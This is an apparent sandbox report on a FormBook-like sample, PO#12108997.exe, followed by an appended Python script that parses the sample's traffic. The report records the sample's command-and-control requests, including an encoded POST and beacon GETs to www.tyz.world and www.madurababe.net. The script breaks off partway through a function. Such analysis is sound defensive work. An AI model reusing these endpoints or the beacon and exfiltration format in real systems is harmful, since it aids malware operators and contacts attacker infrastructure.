77 78 6c 4b 4f 4b 68 45 52 75 4b 71 65 4a 67 35 31 6a 6c 50 55 49 4a 74 64 4f 4e 41 63 52 6d 65 68 61 41 58 67 33 69 47 6b 4c 6b 31 62 35 49 77 6e 50 34 43 74 41 4c 58 4e 48 59 7a 72 44 68 4d 53 33 49 76 57 61 68 55 6d 44 47 4e 74 43 33 79 75 72 78 4f 74 41 52 71 51 32 5a 4f 37 72 37 58 68 44 44 47 4c 28 59 6b 53 55 49 75 6e 56 6d 49 34 28 50 59 36 75 66 61 66 57 35 46 74 47 54 52 72 7e 56 51 33 48 30 62 46 6f 57 4f 76 55 53 32 63 5a 43 52 34 59 52 62 5f 6c 35 70 38 4c 7a 72 73 68 42 39 6b 28 56 7e 64 32 42 42 43 63 57 35 6f 63 37 76 2d 71 4e 73 46 73 30 49 62 73 2d 37 66 72 79 6d 77 75 42 68 7a 39 79 4c 43 70 39 35 37 78 44 41 49 67 39 66 68 45 47 70 2d 4e 5a 7a 70 74 48 43 71 56 32 63 51 44 67 48 42 6b 66 39 6a 4f 70 33 72 59 6c 51 62 77 79 62 76 30 7a 75 46 56 4b 32 59 42 74 67 2d 69 34 72 30 72 45 73 53 49 36 32 4f 48 48 6f 35 54 52 31 41 39 77 6c 34 49 50 76 39 54 46 54 64 4e 36 58 31 75 33 72 4a 63 52 32 4d 6c 6d 4c 78 65 59 74 73 28 36 6a 55 7a 45 37 6c 59 45 6b 2d 4c 6f 42 47 54 32 7a 77 37 47 6e 57 38 45 74 53 39 2d 4a 69 38 6e 41 56 76 75 35 78 71 
70 44 62 73 79 68 41 35 77 71 72 56 54 77 68 7a 34 4a 71 4d 37 66 77 6b 6b 55 31 30 33 38 42 73 56 30 41 73 68 33 5f 58 67 64 4a 57 66 47 30 33 35 77 33 67 70 79 42 53 48 64 33 4d 32 32 42 47 4a 39 30 6d 38 78 79 62 46 4d 35 73 57 74 53 69 5a 53 4b 76 63 4e 44 39 45 72 79 31 5a 6f 6d 78 79 55 52 71 4d 6f 41 6b 4c 76 4b 79 34 59 58 5a 49 4d 57 4a 53 6b 75 67 4a 55 4d 37 32 39 67 30 75 47 55 45 50 35 31 68 6a 28 76 58 6d 4e 55 4e 53 45 2d 52 35 45 43 69 36 4b 4f 42 64 50 6f 53 4a 64 30 61 47 35 61 6e 61 4d 46 31 58 77 46 31 6f 50 54 62 38 42 62 36 62 49 55 79 51 71 59 35 69 76 4a 6c 62 79 56 7a 49 58 4d 64 50 4a 42 39 36 49 77 35 56 30 72 66 35 62 44 6e 59 68 34 72 53 37 4c 38 4a 5a 36 6f 30 63 33 6c 31 70 33 74 38 73 53 7a 39 54 4b 33 4e 62 43 43 31 32 7a 4d 34 62 72 68 63 51 48 35 33 70 64 55 51 62 4d 74 67 62 56 52 36 6c 6b 72 61 6d 5a 46 71 6d 79 71 48 76 48 32 67 37 55 61 57 46 4e 55 6a 64 59 6c 49 30 37 32 64 58 6b 71 5f 75 75 55 7a 69 41 4a 71 7e 46 4e 64 38 39 52 45 52 68 46 39 4f 73 72 4c 63 4e 5a 52 53 6e 78
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 09:55:46 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: PO#12108997.exe, 00000000.00000003.241230450.00000000062C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://en.w
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comB
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comF
          Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coma
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comalic
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comals
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comd
          Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comicta
          Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiono?
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commsed
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com~
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnal
          Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
          Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-ca
          Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-p
          Source: PO#12108997.exe, 00000000.00000003.243228061.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnu
          Source: PO#12108997.exe, 00000000.00000003.253530830.00000000062F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/L
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/h
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
          Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madurababe.net
          Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madurababe.net/p12s/
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com2
          Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242576157.00000000062DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 00000011.00000002.504685915.000000000558F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD
          Source: unknown | HTTP traffic detected:
          POST /p12s/ HTTP/1.1
          Host: www.tyz.world
          Connection: close
          Content-Length: 408
          Cache-Control: no-cache
          Origin: http://www.tyz.world
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.tyz.world/p12s/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00
          Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
          Source: unknown | DNS traffic detected: queries for: www.tyz.world
          Source: global traffic | HTTP traffic detected:
          GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1
          Host: www.tyz.world
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Source: global traffic | HTTP traffic detected:
          GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1
          Host: www.madurababe.net
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
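The POST and the two GETs listed above, replayed through a small triage script. This is an added example and is not part of the report or of Joe Sandbox: the requests are constructed from the report's method, path, host, header values and form/query blobs (CRLF framing reconstructed, Content-Length computed from the body), and the parser, the beacon heuristic and every function name are this example's own assumptions rather than a published FormBook signature. It also sorts a handful of the report's memory strings into those corroborated by observed traffic and the font-licence noise that the sample's embedded font resources account for.

```python
"""Triage of FormBook-style C2 traffic as recorded in a sandbox report.

Added example, not report or Joe Sandbox code. Requests are constructed
from the report (framing reconstructed, Content-Length computed); the
beacon heuristic generalises from those three requests and is an
assumption, not a vendor signature.
"""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlsplit

# Form body of the POST, copied from the report's "Data Ascii" (trailing NULs omitted).
POST_BODY = (
    "3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9Uq"
    "dSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiV"
    "RXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rN"
    "R83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A)."
)
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def _post(host, path, body):
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"Content-Length: {len(body)}\r\nCache-Control: no-cache\r\nOrigin: http://{host}\r\n"
            f"User-Agent: {UA}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            f"Referer: http://{host}{path}\r\nAccept-Language: en-US\r\n"
            f"Accept-Encoding: gzip, deflate\r\n\r\n{body}")


def _get(host, target):
    # The report's GETs carry nothing beyond Host and Connection.
    return f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"


SAMPLE_REQUESTS = [  # constructed from the report's three requests
    _post("www.tyz.world", "/p12s/", POST_BODY),
    _get("www.tyz.world", "/p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA"),
    _get("www.madurababe.net", "/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd"),
]

MEMORY_STRINGS = [  # a few of the report's "String found in binary or memory" hits, verbatim
    "http://www.fontbureau.com/designers",
    "http://www.fontbureau.comalic",
    "http://www.typography.netD",
    "http://www.founder.com.cn/cn/bThe",
    "http://www.madurababe.net",
    "http://www.madurababe.net/p12s/",
    "https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD",
]


@dataclass
class Request:
    method: str
    path: str
    query: str
    headers: dict
    body: str


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, lower-cased header names, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only: values contain "http://"
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
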